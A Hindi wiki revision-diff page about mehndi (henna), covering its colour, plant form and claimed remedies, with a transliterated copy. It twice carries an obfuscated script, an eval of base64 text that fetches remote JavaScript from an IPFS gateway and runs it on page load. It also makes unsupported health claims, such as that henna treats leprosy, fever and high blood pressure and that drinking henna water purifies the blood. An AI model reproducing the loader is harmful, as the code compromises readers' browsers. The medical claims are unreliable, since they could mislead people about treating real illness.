Difference between revisions of "मेंहदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 +
{{tocright}}
 
'''मेंहदी''' का इस्तेमाल गर्मी में ठंडक देने के लिए किया जाता है। कुछ लोग विशेषकर बूढे़ अपने सफेद रंग सफेद बालों में मेंहदी लगाकर बालों को सुनहरे बनाने की कोशिश करते हैं, '''इससे दिमाग में ठंडक''' मिलती है। मेंहदी मानव स्वास्थ्य को बनाये रखती है। यदि आप सिर दर्द से परेशान हैं तो मेंहदी की पत्तियों को पीसकर उनका सिर पर लेप करने से जल्दी आराम मिलता है। मेंहदी के पेड़ सदाबहार झाड़ियों के रूप में पाये जाते हैं। महिलाएं इसका प्रयोग [[श्रृंगार]] शोभा को बढ़ाने के लिए करती हैं। यही कारण है कि यह बहुत विश्वसनीय है। मेंहदी की पत्तियों को सुखाकर बनाया पाउडर बाजार में कम कीमत पर आसानी से आकर्षक पैक में मिलती है।
 
'''मेंहदी''' का इस्तेमाल गर्मी में ठंडक देने के लिए किया जाता है। कुछ लोग विशेषकर बूढे़ अपने सफेद रंग सफेद बालों में मेंहदी लगाकर बालों को सुनहरे बनाने की कोशिश करते हैं, '''इससे दिमाग में ठंडक''' मिलती है। मेंहदी मानव स्वास्थ्य को बनाये रखती है। यदि आप सिर दर्द से परेशान हैं तो मेंहदी की पत्तियों को पीसकर उनका सिर पर लेप करने से जल्दी आराम मिलता है। मेंहदी के पेड़ सदाबहार झाड़ियों के रूप में पाये जाते हैं। महिलाएं इसका प्रयोग [[श्रृंगार]] शोभा को बढ़ाने के लिए करती हैं। यही कारण है कि यह बहुत विश्वसनीय है। मेंहदी की पत्तियों को सुखाकर बनाया पाउडर बाजार में कम कीमत पर आसानी से आकर्षक पैक में मिलती है।
 
==रंग==
 
==रंग==
Line 9: Line 10:
 
मेंहदी का प्रयोग केवल बालों को सुदंर बनाने के लिए ही नहीं किया जाता है, बल्कि इसका प्रयोग विभिन्न रोगों के इलाज में किया जाता है। खून के विकार, उल्टी, कब्ज, कफ-पित्त, कुष्ठ (कोढ़), बुखार, जलन, रक्तपित्त, पेशाब करने में कठिनाई होना (मूत्रकृच्छ) तथा खुजली आदि रोगों में मेंहदी काफी लाभकारी है। उच्च रक्तचाप से पीड़ित व्यक्ति के पैरों के तलुवों और हथेलियों पर मेंहदी का लेप समय-समय पर करने से आराम मिलता है। मेंहदी लगाने से शरीर की बढ़ी हुई गर्मी बाहर निकल जाती है। रात के समय मेंहदी को साफ पानी में भिगो दें और सवेरे के समय छानकर पीयें। इसके पीने से खून की सफाई होने के साथ-साथ शरीर के अन्दर की गर्मी भी शांत हो जाती है।
 
मेंहदी का प्रयोग केवल बालों को सुदंर बनाने के लिए ही नहीं किया जाता है, बल्कि इसका प्रयोग विभिन्न रोगों के इलाज में किया जाता है। खून के विकार, उल्टी, कब्ज, कफ-पित्त, कुष्ठ (कोढ़), बुखार, जलन, रक्तपित्त, पेशाब करने में कठिनाई होना (मूत्रकृच्छ) तथा खुजली आदि रोगों में मेंहदी काफी लाभकारी है। उच्च रक्तचाप से पीड़ित व्यक्ति के पैरों के तलुवों और हथेलियों पर मेंहदी का लेप समय-समय पर करने से आराम मिलता है। मेंहदी लगाने से शरीर की बढ़ी हुई गर्मी बाहर निकल जाती है। रात के समय मेंहदी को साफ पानी में भिगो दें और सवेरे के समय छानकर पीयें। इसके पीने से खून की सफाई होने के साथ-साथ शरीर के अन्दर की गर्मी भी शांत हो जाती है।
  
5.मेंहदी लगाना : मेंहदी सोलह श्रृंगारों में से एक है। यह ना केवल सौंन्दर्य बढ़ाती है बल्कि इसके लगाने के पीछे तथ्य यह है कि मेंहदी की तासीर ठण्डी होती है और हाथों में मेंहदी लगाए जाने का उद्देश्य अपने धैर्य और शांति को बनाए रखने का प्रतीक माना जा सकता है। आज मेंहदी का प्रयोग ना केवल हाथों में होता है बल्कि पैरों में भी शौक के रूप में इसे लगाया जाता है जो एक अच्छा संकेत है।
+
मेंहदी लगाना :मेंहदी सोलह श्रृंगारों में से एक है। यह ना केवल सौंन्दर्य बढ़ाती है बल्कि इसके लगाने के पीछे तथ्य यह है कि मेंहदी की तासीर ठण्डी होती है और हाथों में मेंहदी लगाए जाने का उद्देश्य अपने धैर्य और शांति को बनाए रखने का प्रतीक माना जा सकता है। आज मेंहदी का प्रयोग ना केवल हाथों में होता है बल्कि पैरों में भी शौक के रूप में इसे लगाया जाता है जो एक अच्छा संकेत है।
  
  

Revision as of 10:45, 27 January 2011

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

meanhadi ka istemal garmi mean thandak dene ke lie kiya jata hai. kuchh log visheshakar boodhe़ apane saphed rang saphed baloan mean meanhadi lagakar baloan ko sunahare banane ki koshish karate haian, isase dimag mean thandak milati hai. meanhadi manav svasthy ko banaye rakhati hai. yadi ap sir dard se pareshan haian to meanhadi ki pattiyoan ko pisakar unaka sir par lep karane se jaldi aram milata hai. meanhadi ke pe d sadabahar jha diyoan ke roop mean paye jate haian. mahilaean isaka prayog shrriangar shobha ko badhane ke lie karati haian. yahi karan hai ki yah bahut vishvasaniy hai. meanhadi ki pattiyoan ko sukhakar banaya paudar bajar mean kam kimat par asani se akarshak paik mean milati hai.

rang

meanhadi ke pe d ki pattiyaan hare rang ki hoti haian, ise pisakar tvacha par lagane se lal rang ka nikhar kee dinoan tak rahata hai. meanhadi ka svad kashaila hota hai.

meanhadi ka svaroop:

meanhadi ke pe d ki pattiyoan ki lambaee lagabhag 1 ianch se dedh ianch ke lagabhag hoti hai. meanhadi ke patte aande ke jaise hote haian. isake phool atyant suangandhit hote haian tatha phal matar ke saman, golakar hote haian jinake bhitar chhote-chhote tribhuj ki akriti ke chikane anek bij hote haian. isamean aktoobar-navambar mean phool aur usake bad phal lagate haian. meanhadi ki pattiyoan mean tainin tatha vason namak mukhy rajak dravy taral paye jate haian. isake atirikt mailik esid, glookoj mainitol, vasaral aur myoosilej adi tatch meanhadi mean paye jate haian. isase ek gadhe bhoore rang ka sugandhit tel bhi prapt kiya jata hai.

meanhadi ke gun

meanhadi ki tasir than di hoti haian. yah baloan mean chamak ke sath-sath dimag ko shaant rakhati hai. meanhadi ka prayog keval baloan ko sudanr banane ke lie hi nahian kiya jata hai, balki isaka prayog vibhinn rogoan ke ilaj mean kiya jata hai. khoon ke vikar, ulti, kabj, kaph-pitt, kushth (kodh), bukhar, jalan, raktapitt, peshab karane mean kathinaee hona (mootrakrichchh) tatha khujali adi rogoan mean meanhadi kaphi labhakari hai. uchch raktachap se pi dit vyakti ke pairoan ke taluvoan aur hatheliyoan par meanhadi ka lep samay-samay par karane se aram milata hai. meanhadi lagane se sharir ki badhi huee garmi bahar nikal jati hai. rat ke samay meanhadi ko saph pani mean bhigo dean aur savere ke samay chhanakar piyean. isake pine se khoon ki saphaee hone ke sath-sath sharir ke andar ki garmi bhi shaant ho jati hai.

meanhadi lagana :meanhadi solah shrriangaroan mean se ek hai. yah na keval sauanndary badhati hai balki isake lagane ke pichhe tathy yah hai ki meanhadi ki tasir thandi hoti hai aur hathoan mean meanhadi lagae jane ka uddeshy apane dhairy aur shaanti ko banae rakhane ka pratik mana ja sakata hai. aj meanhadi ka prayog na keval hathoan mean hota hai balki pairoan mean bhi shauk ke roop mean ise lagaya jata hai jo ek achchha sanket hai.




panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh